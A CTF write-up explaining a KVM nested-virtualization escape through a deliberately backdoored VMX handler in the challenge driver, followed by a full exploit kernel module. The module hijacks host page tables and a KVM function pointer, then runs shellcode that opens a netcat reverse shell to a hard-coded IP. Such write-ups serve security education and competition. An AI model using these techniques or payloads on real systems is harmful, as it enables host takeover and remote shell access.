Will's Root: corCTF 2024 - Trojan Turtles: A KVM Escape Exploit from the L2 Guest to the L1 Hypervisor

For the past several iterations of corCTF, we have hoped to release 2 new types of challenges in our competition: a Windows kernel and a hypervisor escape challenge. With less than 2 days to go before this year’s CTF, we only had 3 pwnable challenges. There was an incoming potential Windows kernel challenge marred by infrastructure difficulties (which never made it to release despite our tweet poking fun at Crowdstrike), so I decided to try my hand at making a simple hypervisor escape challenge. Inspired by Project Zero’s crazy SVM nested KVM escape exploit, I decided to dig briefly into KVM’s VMX nested hypervisor.

Nested virtualization is actually quite an interesting topic, and the name of this challenge comes from the original nested KVM paper: The Turtles Project. I recommend that you read the paper, but as a quick high level overview, Intel VMX provides a set of instructions for hardware accelerated virtualization. Virtualized execution is effectively native, except for when traps (VM-exits) occur and require the original host to handle - these traps can be caused by events like MMIO read/writes or certain instructions that VMX operation do not support (like VMX instructions themselves). To support nested guests, Intel and AMD follow the model of a single hypervisor handling all guests and nested guests. The root hypervisor at L0 can then emulate VMX instructions for its L1 guest for when the L1 guest becomes the “KVM hypervisor” for the L2 guest. L0 would thus setup all the VMX structures that L1 is attempting to create for L2 and then basically run L2 as if it is at the same level as the L1 guest (the paper uses the term guest “multiplexing”). When a VM-exit happens, the L0 hypervisor would have to then decide which guest, if any, to forward the handling to. At each level (L0, L1, L2, L3, etc.), the KVM driver thinks of itself as L0 and can have its own guests and provide VMX emulation for its nested guests. With this idea, we can have nested hypervisors to an arbitrary depth (with terrible performance implications the deeper we go).

For starters, the L1 VM ran a 6.9.0 Linux kernel from the following run script.

#!/bin/sh qemu-system-x86_64 \ -m 1024 \ -nographic \ -no-reboot \ -kernel bzImage-6.9 \ -append "console=ttyS0 root=/dev/sda quiet loglevel=3 rd.systemd.show_status=auto rd.udev.log_level=3 panic=-1 net.ifnames=0 pti=off no5lvl" \ -hda chall.qcow2 \ -snapshot \ -netdev user,id=net \ -device e1000,netdev=net \ -monitor /dev/null \ -cpu host \ -smp cores=2 \ --enable-kvm

It ran an Alpine Busybox system with the OpenRC init system. Upon startup, it ran the following startup script as a low-privileged user to boot the L2 guest into superuser, which ran an Ubuntu 5.15.0-107 HWE kernel:

#!/bin/sh cd /vm qemu-system-x86_64 \ -m 512 \ -smp 1 \ -nographic \ -kernel "./bzImage" \ -append "console=ttyS0 loglevel=3 panic=-1 pti=off kaslr no5lvl" \ -no-reboot \ -netdev user,id=net \ -device e1000,netdev=net \ -monitor /dev/null \ -cpu host \ -initrd "./initramfs.cpio.gz" \ -enable-kvm

As stated in the description, the goal is to escape from the L2 guest into the L1 host with root privileges. Provided to the players were two KVM drivers used in the L1 host, with one backdoored as a play off the recent xz supply chain fiasco. With binary diffing tools like BinDiff or Diaphora, one can quickly that there are only two differences, in the handle_vmread and the handle_vmwrite functions.

In both cases, an extra snippet of code was added before the inlined call to get_vmcs12_field_offset after some simple vmread and vmwrite condition checks.

For handle_vmread it was the following:

if (kvm_get_dr(vcpu, 0) == 0x1337babe) { int64_t offset = kvm_get_dr(vcpu, 1); kvm_set_dr(vcpu, 2, *(((uint64_t* )vmcs12) + offset)); }

And for handle_vmwrite:

if (kvm_get_dr(vcpu, 0) == 0x1337babe) { int64_t offset = kvm_get_dr(vcpu, 1); uint64_t val = kvm_get_dr(vcpu, 2); *(((uint64_t *)vmcs12) + offset) = val; }

Basically, if the debug register dr0 holds a specific magic value, then dr1 and dr2 are used to perform arbitrary OOB read/write from the emulated vmcs12 structure the hypervisor allocates for nested guests. More specifically, this vmcs12 structure is allocated in the L1 host (running under an L0 host) when it performs VMX emulation for an L2 guest attempting to kick off an L3 guest - all these layers can become really confusing!

The following two article series do a really good job explaining how to commence VMX execution modes for hypervisor development: https://rayanfam.com/topics/hypervisor-from-scratch-part-3/, https://revers.engineering/7-days-to-virtualization-a-series-on-hypervisor-development/. To trigger the evil code path, all we have to do is to enter VMX root operation with the vmxon instruction and declare a VMCS (Virtual-Machine Control Structure) with the vmptrld instruction. VMX root operation allows the hypervisor to prepare and control the behavior of the guest, which runs in non-root operation. When executing vmxon in a guest, the emulated VMX handler handle_vmxon zero-allocates a page for the nested guest’s VMCS structure.

For triggering and utilizing the backdoor, I created the following primitives:

static uint8_t vmxon(volatile uint64_t phys) { uint8_t ret; asm volatile(INTEL( "vmxon [%[phys]];" "setna %[ret];") :[ret]"=r"(ret):[phys]"r"(&phys):); return ret; } static uint8_t vmptrld(volatile uint64_t phys) { uint8_t ret; asm volatile(INTEL( "vmptrld [%[phys]];" "setna %[ret];") :[ret]"=r"(ret):[phys]"r"(&phys):); return ret; } static uint64_t vmread(volatile uint16_t field) { uint8_t ret; uint64_t result; asm volatile(INTEL( "vmread [%[result]], %[field];" "setna %[ret];") :[ret]"=r"(ret):[result]"r"(&result),[field]"r"((uint64_t)field):); if (ret) { printk(KERN_WARNING "vmread of field 0x%x failed\n", field); } return (ret)?ret:result; } static uint8_t vmwrite(volatile uint16_t field, volatile uint64_t val) { uint8_t ret; asm volatile(INTEL( "vmwrite %[field], [%[val]];" "setna %[ret];") :[ret]"=r"(ret):[val]"r"(&val),[field]"r"((uint64_t)field):); return ret; } #define BACKDOOR_TRIGGER 0x1337babe #define VM_FUNCTION_CONTROL 0x00002018 #define STRINGIFY(x) #x #define STRINGIFY_INT(x) STRINGIFY(x) static uint64_t oob_read(uint64_t offset) { uint8_t err; uint64_t val; asm volatile(INTEL( "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";" "mov dr0, rax;" "mov rax, %[offset];" "mov dr1, rax;" "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";" "call %[vmread];" "mov %[err], al;") :[err]"=r"(err):[offset]"r"(offset),[vmread]"r"(&vmread):"rax","rdi"); if (err) { printk(KERN_INFO "oob read 0x%llx failure\n", offset); asm volatile ("ud2;"); } asm volatile(INTEL( "mov rax, dr2;" "mov %[val], rax;") :[val]"=r"(val)::"rax"); return val; } static void oob_write(uint64_t offset, uint64_t val) { uint8_t err; asm volatile(INTEL( "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";" "mov dr0, rax;" "mov rax, %[offset];" "mov dr1, rax;" "mov rax, %[val];" "mov dr2, rax;" "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";" "call %[vmwrite];" "mov %[err], al;") :[err]"=r"(err):[offset]"r"(offset),[val]"r"(val),[vmwrite]"r"(&vmwrite):"rax","rdi"); if (err) { printk(KERN_INFO "oob write 0x%llx (%llx) failure\n", offset, val); asm volatile ("ud2;"); } }

Now, the L2 guest has arbitrary OOB read and write in the L1 hypervisor’s kernel. At this point, the challenge just becomes a case of “pwn the kernel” given arbitrary OOB read/write on the kernel heap, albeit without a shell on the host. It’s not particularly difficult, so I will just outline my approach.

I first wipe the first qword of the guest kernel memory and the guest’s modprobe_path. This is useful for the next step to avoid a potential L1 kernel crash. The beginning of the physical zero page contains many instances of the qword 0xf000ff53, which are probably just real mode far pointers from bootloader or firmware execution.
I now scan for L1’s kernel modprobe_path's address from L1’s physmap’s perspective. A pattern that will often repeat itself is xor-encrypting the search target and xor-decrypting the results from the OOB read. This mechanism prevents my read/write primitives from accidentally reading into this exploit driver itself. Additionally, I optimize the search by using the known last 12 bits of the target item so the search interval can be done in 0x1000 intervals (as the vmcs12 structure itself is page sized). Note that to account for the hypervisor modprobe_path being either before or after vmcs12 in physmap, I search backwards until I encounter 0xf000ff53. If the search has not been successful yet, I start searching forward (otherwise, I’ll read before physical memory zero and crash the L1 host).
With modprobe_path’s location in L1 physmap found, I can now figure out L1’s physmap base by computing the relative offset of page_offset_base and performing another OOB read. I can also figure out the location of L1 kernel base from the physmap view, as well as where my current vmcs12 is located in the L1 kernel virtual address space. This last piece of information would then unlock arb read and write primitives.
Looking into the future, the ultimate goal for privilege escalation is to hijack a function pointer. The aforementioned Project Zero SVM escape exploit provided a great target: kvm->arch.kvmclock_update_work.work.func. How do we find the kvm struct for our current L2 guest in the L1 host? We can accomplish this by searching for the kvm_vcpu struct, whose first field points to the kvm struct. To find the kvm_vcpu struct, we can probe for its arch field of kvm_vcpu_arch by setting the dr3 register. kvm_vcpu are allocated from the KVM_CREATE_VCPU ioctl to the KVM driver and are pulled from its own kmem_cache. Based on /proc/slabinfo, each slab only holds 3 of these objects, with the lower 12 bits of the dr3 storage location being 0xb80, 0xc40, and 0xd00.
Now, with the knowledge of the L1 virtual addresses for our L2 guest’s kvm and kvm_vcpu struct, we figure out what the target function pointer currently holds. This will be used as a continuation function to seamlessly resume normal system operation after our exploit payload triggers.
Here is where the fun part of my exploit begins. Using knowledge of the L1 physmap and kernel layout, I walk the task_struct objects starting from init_task to find the mm pointer, from which I can read the pgd field - this allows me to know the root page table pointer (or PML4 pointer for 4 level paging systems - x86_64 paging terminology can get really confusing) for a given task in the L1 kernel. I then find the location of the PUD based on the L1 physmap virtual address to get the PUD table that control the kernel mapping which every task should share.
While traversing the list of tasks, one can also fetch the actual virtual address for the kernel .text base based on the linked lists that connect back to init_task.
Now I find a free entry in the PUD to add an entry that maps a 1 GB huge page starting from physical address 0 that is read, write, and execute. I then fill up L1 physical page 0 with shellcode that basically does call_usermodehelper to run a netcat reverse shell with UMH_WAIT_EXEC. Execution can then continue after the reverse shell process begins and I trampoline it back to the original function in kvm->arch.kvmclock_update_work.work.func. While I could have modified existing pagetable entries in the L1 host, I would have to ensure that entries were flushed from the TLB for the permissions to become architecturally visible.
Now, I overwrote the target function pointer to the new evil rwx page and wait around 5 minutes (as mentioned in the Project Zero exploit). While the system continues to function smoothly, I eventually get a reverse shell with the hypervisor escaped!

Here is the final exploit:

#include <asm-generic/io.h> #include <linux/kernel.h> #include <linux/module.h> #include <linux/device.h> #include <linux/mutex.h> #include <linux/fs.h> #include <linux/miscdevice.h> #include <linux/kmod.h> #include <linux/kprobes.h> #include <linux/types.h> #include <linux/slab.h> #include <linux/mm.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("FizzBuzz101"); #define INTEL(x) \ ".intel_syntax noprefix;" \ x \ ".att_syntax;" #define IA32_FEATURE_CONTROL 0x3a #define IA32_VMX_BASIC 0x480 #define IA32_VMX_CR0_FIXED0 0x486 #define IA32_VMX_CR0_FIXED1 0x487 #define IA32_VMX_CR4_FIXED0 0x488 #define IA32_VMX_CR4_FIXED1 0x489 typedef union { uint64_t value; struct { uint64_t lock : 1; uint64_t enable_smx : 1; uint64_t enable_vmxon : 1; uint64_t reserved : 61; } fields; } IA32_FEATURE_CONTROL_MSR; typedef struct { uint32_t revision : 31; uint32_t shadow_vmcs : 1; }vmxon_region_t; typedef struct { struct { uint32_t revision : 31; uint32_t shadow_vmcs : 1; }header; }vmcs_region_t; static struct kprobe kp = { .symbol_name = "kallsyms_lookup_name" }; static unsigned long (*find_symbol)(const char* name); static bool supports_vmx(void) { // Intel SDM 22.6-7 uint32_t eax, ebx, ecx, edx; IA32_FEATURE_CONTROL_MSR feature_msr; cpuid(0, &eax, &ebx, &ecx, &edx); // check if GenuineIntel if (ebx != 0x756e6547 || edx != 0x49656e69 || ecx != 0x6c65746e) return false; cpuid(1, &eax, &ebx, &ecx, &edx); // check for VMX support if (!(ecx & (1 << 5))) return false; // check 0x3a MSR on IA32_FEATURE_CONTROL, rdmsrl(IA32_FEATURE_CONTROL, feature_msr.value); if (!feature_msr.fields.lock) { feature_msr.fields.lock = 1; feature_msr.fields.enable_vmxon = 1; wrmsrl(IA32_FEATURE_CONTROL, feature_msr.value); } else if (!feature_msr.fields.enable_vmxon) { return false; } return true; } static uint64_t read_cr4(void) { uint64_t cr4 = 0; asm volatile(INTEL( "mov %0, cr4\n") :"=r"(cr4)::); return cr4; } static void write_cr4(uint64_t cr4) { asm volatile(INTEL( "mov cr4, %0\n") ::"r"(cr4):); } // entering with VMXON without CR4.VMXE results in UD, and set up MSRs accordingly static void enable_vmxe(void) { uint64_t msr_cr0_0, msr_cr0_1, msr_cr4_0, msr_cr4_1, cr0, cr4; cr4 = read_cr4(); cr4 |= 1 << 13; write_cr4(cr4); // fix up CR0 and CR4 rdmsrl(IA32_VMX_CR0_FIXED0, msr_cr0_0); rdmsrl(IA32_VMX_CR0_FIXED1, msr_cr0_1); rdmsrl(IA32_VMX_CR4_FIXED0, msr_cr4_0); rdmsrl(IA32_VMX_CR4_FIXED1, msr_cr4_1); cr0 = read_cr0(); cr4 = read_cr4(); cr0 = (cr0 | msr_cr0_0) & msr_cr0_1; cr4 = (cr4 | msr_cr4_0) & msr_cr4_1; write_cr0(cr0); write_cr4(cr4); } static inline void initialize_vmxon(vmxon_region_t *region) { uint64_t revision; rdmsrl(IA32_VMX_BASIC, revision); region->revision = revision; } static inline void initialize_vmcs(vmcs_region_t *region, bool shadow) { uint64_t revision; rdmsrl(IA32_VMX_BASIC, revision); region->header.revision = revision; region->header.shadow_vmcs = (shadow)?1:0; } static uint8_t vmxon(volatile uint64_t phys) { uint8_t ret; asm volatile(INTEL( "vmxon [%[phys]];" "setna %[ret];") :[ret]"=r"(ret):[phys]"r"(&phys):); return ret; } static uint8_t vmptrld(volatile uint64_t phys) { uint8_t ret; asm volatile(INTEL( "vmptrld [%[phys]];" "setna %[ret];") :[ret]"=r"(ret):[phys]"r"(&phys):); return ret; } static uint64_t vmread(volatile uint16_t field) { uint8_t ret; uint64_t result; asm volatile(INTEL( "vmread [%[result]], %[field];" "setna %[ret];") :[ret]"=r"(ret):[result]"r"(&result),[field]"r"((uint64_t)field):); if (ret) { printk(KERN_WARNING "vmread of field 0x%x failed\n", field); } return (ret)?ret:result; } static uint8_t vmwrite(volatile uint16_t field, volatile uint64_t val) { uint8_t ret; asm volatile(INTEL( "vmwrite %[field], [%[val]];" "setna %[ret];") :[ret]"=r"(ret):[val]"r"(&val),[field]"r"((uint64_t)field):); return ret; } #define BACKDOOR_TRIGGER 0x1337babe #define VM_FUNCTION_CONTROL 0x00002018 #define STRINGIFY(x) #x #define STRINGIFY_INT(x) STRINGIFY(x) static uint64_t oob_read(uint64_t offset) { uint8_t err; uint64_t val; asm volatile(INTEL( "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";" "mov dr0, rax;" "mov rax, %[offset];" "mov dr1, rax;" "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";" "call %[vmread];" "mov %[err], al;") :[err]"=r"(err):[offset]"r"(offset),[vmread]"r"(&vmread):"rax","rdi"); if (err) { printk(KERN_INFO "oob read 0x%llx failure\n", offset); asm volatile ("ud2;"); } asm volatile(INTEL( "mov rax, dr2;" "mov %[val], rax;") :[val]"=r"(val)::"rax"); return val; } static void oob_write(uint64_t offset, uint64_t val) { uint8_t err; asm volatile(INTEL( "mov rax, " STRINGIFY_INT(BACKDOOR_TRIGGER) ";" "mov dr0, rax;" "mov rax, %[offset];" "mov dr1, rax;" "mov rax, %[val];" "mov dr2, rax;" "mov rdi, " STRINGIFY_INT(VM_FUNCTION_CONTROL) ";" "call %[vmwrite];" "mov %[err], al;") :[err]"=r"(err):[offset]"r"(offset),[val]"r"(val),[vmwrite]"r"(&vmwrite):"rax","rdi"); if (err) { printk(KERN_INFO "oob write 0x%llx (%llx) failure\n", offset, val); asm volatile ("ud2;"); } } #define POB_TO_MODPROBE (0xffffffff913fd1f8ull - 0xffffffff9173f0c0ull) #define KBASE_TO_MODPROBE (0xffffffff8fc00000ull - 0xffffffff9173f0c0ull) #define INIT_TASK_TO_NEXT_TASK 0x478ull #define CALC_BACK_OFFSET(x) ((0x1000ull - (0x1000ull - x)) / sizeof(uint64_t)) #define CALC_FORW_OFFSET(x) (x / sizeof(uint64_t)) #define PAGE_OFF (0x1000 / sizeof(uint64_t)) #define IDXIFY(x) (x / sizeof(uint64_t)) #define XOR_ENCRYPT_KEY 0x4141414141414141ull #define HOST_MODPROBE_OFFSET 0x0c0ull static void gwipe_first_qword(void) { *(uint64_t *)page_offset_base = 0; } static int64_t hfind_modprobe_offset(void) { // probably backwards // null out ours first memset((uint8_t*)find_symbol("modprobe_path"), 0, 0x10); // hex(struct.unpack('q',b"/sbin/mo")[0] ^ 0x4141414141414141) uint64_t xored_magic = 0x2e2c6e2f2823326e; int64_t offset = CALC_BACK_OFFSET(HOST_MODPROBE_OFFSET); uint64_t check = 0xf000ff53f000ff53ull ^ XOR_ENCRYPT_KEY; int64_t check_offset = 0; bool forward = false; while ((oob_read(offset) ^ XOR_ENCRYPT_KEY) != xored_magic) { offset -= PAGE_OFF; check_offset -= PAGE_OFF; if ((oob_read(check_offset) ^ XOR_ENCRYPT_KEY) == check) { forward = true; break; } } if (forward) { offset = CALC_FORW_OFFSET(HOST_MODPROBE_OFFSET); while ((oob_read(offset) ^ XOR_ENCRYPT_KEY) != xored_magic) offset += PAGE_OFF; } return offset; } static int64_t hfind_physmap_offset(void) { uint64_t check = 0xf000ff53f000ff53ull ^ XOR_ENCRYPT_KEY; int64_t check_offset = 0; while ((oob_read(check_offset) ^ XOR_ENCRYPT_KEY) != check) { check_offset -= PAGE_OFF; } return check_offset; } #define EGG1 0x1337beefdeadbabe // 3 objs per vcpu kmem cache, these are all the possible offsets #define ARCH_DB_3_OFFSET_0 0xb80ull #define ARCH_DB_3_OFFSET_1 0xc40ull #define ARCH_DB_3_OFFSET_2 0xd00ull static uint64_t hfind_vcpu_arch_db3(uint64_t physmap_base, uint64_t vmcs12) { asm volatile(INTEL( "mov rax, " STRINGIFY_INT(EGG1) ";" "mov dr3, rax;") :::"rax"); uint64_t check = EGG1 ^ XOR_ENCRYPT_KEY; int64_t offsets[] = {(physmap_base + ARCH_DB_3_OFFSET_0 - vmcs12) / 8, (physmap_base + ARCH_DB_3_OFFSET_1 - vmcs12) / 8, (physmap_base + ARCH_DB_3_OFFSET_2 - vmcs12) / 8}; bool found = false; int64_t off; while (!found) { for (int i = 0; i < sizeof(offsets)/sizeof(int64_t); i++) { if ((oob_read(offsets[i]) ^ XOR_ENCRYPT_KEY) == check) { found = true; off = offsets[i]; break; } offsets[i] += PAGE_OFF; if (offsets[i] > 0 && offsets[i] < PAGE_OFF) { if (i == 0) { offsets[i] = CALC_FORW_OFFSET(ARCH_DB_3_OFFSET_0); } else if (i == 1) { offsets[i] = CALC_FORW_OFFSET(ARCH_DB_3_OFFSET_1); } else { offsets[i] = CALC_FORW_OFFSET(ARCH_DB_3_OFFSET_2); } } } } return vmcs12 + (off * 8); } #define EGG2 0xdeadbeefbab31337ull static uint64_t hfind_guest_base_offset(uint64_t physmap_base, uint64_t vmcs12) { int64_t off = (physmap_base - vmcs12) / 8; *(uint64_t *)page_offset_base = EGG2 ^ XOR_ENCRYPT_KEY; while ((oob_read(off) ^ XOR_ENCRYPT_KEY) != EGG2) off += PAGE_OFF; return off; } #define INIT_TASK_OFFSET (0xffffffffb400c980ull - 0xffffffffb2600000ull) #define NEXT_TASK_OFFSET (0xffffffffb400cdf8ull - 0xffffffffb400c980ull) #define MM_TO_NEXT_TASK_OFFSET 0x50 static uint64_t arb_read(uint64_t vmcs12, uint64_t addr) { int64_t off = (addr - vmcs12) / 8; return oob_read(off); } static void arb_write(uint64_t vmcs12, uint64_t addr, uint64_t val) { int64_t off = (addr - vmcs12) / 8; oob_write(off, val); } static void write_str(uint64_t vmcs12, uint64_t addr, char *str, int size) { for (int i = 0; i < size; i += 8) { arb_write(vmcs12, addr + i, *((uint64_t *)(str + i))); } } static __attribute__((naked)) void shellcode(void) { asm volatile(INTEL( "push rdi;" "push rsi;" "push rdx;" "push rcx;" "push rbx;" "lea rbx, qword ptr [rip - 0x111];" "mov rax, qword ptr [rbx];" // call_usermodehelper "lea rdi, qword ptr [rbx + 0x8 * 12];" // cmd, (12 entries) "lea rsi, qword ptr [rbx + 0x10];" // argv "lea rdx, qword ptr [rbx + 0x40];" // envp "xor rcx, rcx;" // UMH_NO_WAIT "inc rcx;" // UMH_WAIT_EXEC "call rax;" "mov rax, qword ptr [rbx + 0x8];" // get continuation "pop rbx;" "pop rcx;" "pop rdx;" "pop rsi;" "pop rdi;" // "ud2;" "jmp rax;" ):::); } static void shellcode_end(void) {} void *vmxon_page; void *vmcs_page; #define CALL_USERMODEHELPER_OFFSET (0xffffffffa94a88e0ull - 0xffffffffa9400000ull) #define UPDATEWORK_TO_KVM_STRUCT_OFFSET (0xffffac2b8029e420ull - 0xffffac2b80295000ull) static int init_exploit_driver(void) { uint64_t vmxon_phys, vmcs_phys; register_kprobe(&kp); find_symbol = (unsigned long (*)(const char *))kp.addr; if (!find_symbol) { pr_warn("failed to find kallsyms_lookup_name\n"); return -1; } unregister_kprobe(&kp); if (!supports_vmx()) { pr_warn("system does not support vmx\n"); return -1; } enable_vmxe(); printk(KERN_INFO "exploit driver loaded\n"); vmxon_page = (void *)get_zeroed_page(GFP_KERNEL); vmcs_page = (void *)get_zeroed_page(GFP_KERNEL); if (!vmxon_page || !vmcs_page) { pr_warn("page allocations failed\n"); return -1; } initialize_vmxon((vmxon_region_t *)vmxon_page); initialize_vmcs((vmcs_region_t *)vmcs_page, false); vmxon_phys = virt_to_phys(vmxon_page); vmcs_phys = virt_to_phys(vmcs_page); if (vmxon(vmxon_phys)) { pr_info("vmxon failed\n"); return -1; } if (vmptrld(vmcs_phys)) { pr_info("vmptrld failed\n"); return -1; } gwipe_first_qword(); uint64_t modprobe_path_offset = hfind_modprobe_offset(); uint64_t page_offset_base_offset = modprobe_path_offset + IDXIFY(POB_TO_MODPROBE); uint64_t physmap_base = oob_read(page_offset_base_offset); uint64_t physmap_base_offset = hfind_physmap_offset(); uint64_t kbase_physmap = 8 * modprobe_path_offset + KBASE_TO_MODPROBE + physmap_base - physmap_base_offset * 8; uint64_t curr_vmcs12 = physmap_base - physmap_base_offset * 8; printk(KERN_INFO "host kbase: 0x%llx\n", kbase_physmap); printk(KERN_INFO "host physmap base: 0x%llx\n", physmap_base); printk(KERN_INFO "current vmcs12: 0x%llx\n", curr_vmcs12); printk(KERN_INFO "physmap base offset: 0x%llx\n", physmap_base_offset); uint64_t curr_vcpu_arch_db3 = hfind_vcpu_arch_db3(physmap_base, curr_vmcs12); printk(KERN_INFO "curr vcpu arch db3: 0x%llx\n", curr_vcpu_arch_db3); uint64_t curr_kvm = arb_read(curr_vmcs12, curr_vcpu_arch_db3 - 0xb80); printk(KERN_INFO "curr kvm: 0x%llx\n", curr_kvm); uint64_t curr_kvm_updatework_funcptr_addr = curr_kvm + UPDATEWORK_TO_KVM_STRUCT_OFFSET + 0x18; uint64_t updatework_orig = arb_read(curr_vmcs12, curr_kvm_updatework_funcptr_addr); printk(KERN_INFO "kvm updatework at: 0x%llx, currently holds: 0x%llx\n", curr_kvm_updatework_funcptr_addr, updatework_orig); uint64_t physmap_init_task = kbase_physmap + INIT_TASK_OFFSET + NEXT_TASK_OFFSET; uint64_t next_task = arb_read(curr_vmcs12, physmap_init_task); uint64_t next_task_mm_ptr = arb_read(curr_vmcs12, next_task + 0x50); uint64_t next_task_pml4_ptr = arb_read(curr_vmcs12, next_task_mm_ptr + 0x80); printk(KERN_INFO "next task pml4 ptr: 0x%llx\n", next_task_pml4_ptr); uint64_t kbase = arb_read(curr_vmcs12, next_task + 8) - (0xffffffffa480cdf8ull - 0xffffffffa2e00000ull); printk(KERN_INFO "kbase: 0x%llx\n", kbase); uint64_t host_guest_base = curr_vmcs12 + hfind_guest_base_offset(physmap_base, curr_vmcs12) * 8; printk(KERN_INFO "host guest base address: 0x%llx\n", host_guest_base); // 47 - 39 uint64_t target_pud_addr = next_task_pml4_ptr + ((physmap_base & (0b111111111ull << 39)) >> 39) * 8; printk(KERN_INFO "physmap start pud entry addr: 0x%llx\n", target_pud_addr); // 39 - 30 uint64_t target_pud = physmap_base + (arb_read(curr_vmcs12, target_pud_addr) & ~0xfffull); printk(KERN_INFO "physmap start pud entry: 0x%llx\n", target_pud); uint64_t offset = 0; // find free entry in pud while (arb_read(curr_vmcs12, target_pud + 8 * offset) != 0) { offset += 1; } uint64_t free_entry = target_pud + offset * 8; uint64_t evil_vaddr = (physmap_base & ~0b111111111111111111111111111111111111111ull) | (offset << 30); // can't modify existing page entries because of TLB printk(KERN_INFO "Filling 0x%llx with 1 GB rwx region starting from physical base 0\n", free_entry); printk(KERN_INFO "New evil 1 gb mapping: 0x%llx\n", evil_vaddr); arb_write(curr_vmcs12, free_entry, 0xe3); // now begin process of writing payload // nc -e /bin/bash IP Port // HOME=/ TERM=linux PATH=/sbin:/usr/sbin:/bin:/usr/bin // 0x0 - | call_usermodehelper location | continuation function | argv (6 qwords) | envp (4 qwords) | strings char cmd[0x10] = "/usr/bin/nc"; char arg0[0x10] = "/usr/bin/nc"; char arg1[0x18] = "192.168.0.100"; char arg2[0x8] = "1337"; char arg3[0x8] = "-e"; char arg4[0x10] = "/bin/bash"; char env0[0x8] = "HOME=/"; char env1[0x10] = "TERM=linux"; char env2[0x30] = "PATH=/sbin:/usr/sbin:/bin:/usr/bin"; uint64_t sc_data_offset = 0; uint64_t string_offset = 12 * 8; arb_write(curr_vmcs12, physmap_base + sc_data_offset, kbase + CALL_USERMODEHELPER_OFFSET); sc_data_offset += 8; // continuation arb_write(curr_vmcs12, physmap_base + sc_data_offset, updatework_orig); sc_data_offset += 8; write_str(curr_vmcs12, physmap_base + string_offset, cmd, sizeof(cmd)); string_offset += sizeof(cmd); write_str(curr_vmcs12, physmap_base + string_offset, arg0, sizeof(arg0)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(arg0); write_str(curr_vmcs12, physmap_base + string_offset, arg1, sizeof(arg1)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(arg1); write_str(curr_vmcs12, physmap_base + string_offset, arg2, sizeof(arg2)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(arg2); write_str(curr_vmcs12, physmap_base + string_offset, arg3, sizeof(arg3)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(arg3); write_str(curr_vmcs12, physmap_base + string_offset, arg4, sizeof(arg4)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(arg4); arb_write(curr_vmcs12, physmap_base + sc_data_offset, 0); sc_data_offset += 8; write_str(curr_vmcs12, physmap_base + string_offset, env0, sizeof(env0)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(env0); write_str(curr_vmcs12, physmap_base + string_offset, env1, sizeof(env1)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(env1); write_str(curr_vmcs12, physmap_base + string_offset, env2, sizeof(env2)); arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset); sc_data_offset += 8; string_offset += sizeof(env2); arb_write(curr_vmcs12, physmap_base + sc_data_offset, 0); sc_data_offset += 8; write_str(curr_vmcs12, physmap_base + string_offset, (char *)&shellcode, (&shellcode_end - &shellcode + 7) & ~7); uint64_t sc_addr = evil_vaddr + string_offset; printk(KERN_INFO "shellcode written at: 0x%llx\n", sc_addr); arb_write(curr_vmcs12, curr_kvm_updatework_funcptr_addr, sc_addr); // https://bugs.chromium.org/p/project-zero/issues/detail?id=2177#c5 - p0 says 5 minutes printk(KERN_INFO "overwriting updatework... give it a few minutes to trigger :clown:\n"); return 0; } static void cleanup_exploit_driver(void) { free_page((uint64_t)vmxon_page); free_page((uint64_t)vmcs_page); printk(KERN_INFO "exploit unloaded\n"); } module_init(init_exploit_driver); module_exit(cleanup_exploit_driver);

By the end of corCTF 2024, there were surprisingly only 2 solves for this challenge. Maybe the daunting challenge description scared people away. Congrats to Billy of Starlabs for taking first blood and zolutal of Shellphish for the second solve! He made a great writeup that I highly recommend you read - he went down a similar approach of targeting page tables, but went for the EPT entries used in VMX acceleration for guest physical to host physical address translation instead. Pumpkin from DEVCORE/Balsn also came up with a post-CTF solve immediately after the CTF ended.

Hope you enjoyed reading this writeup and learned something new! Feel free to let me know if you have any questions or see any mistakes.

Will's Root

Search This Blog

Sunday, August 4, 2024

corCTF 2024 - Trojan Turtles: A KVM Escape Exploit from the L2 Guest to the L1 Hypervisor

No comments:

Post a Comment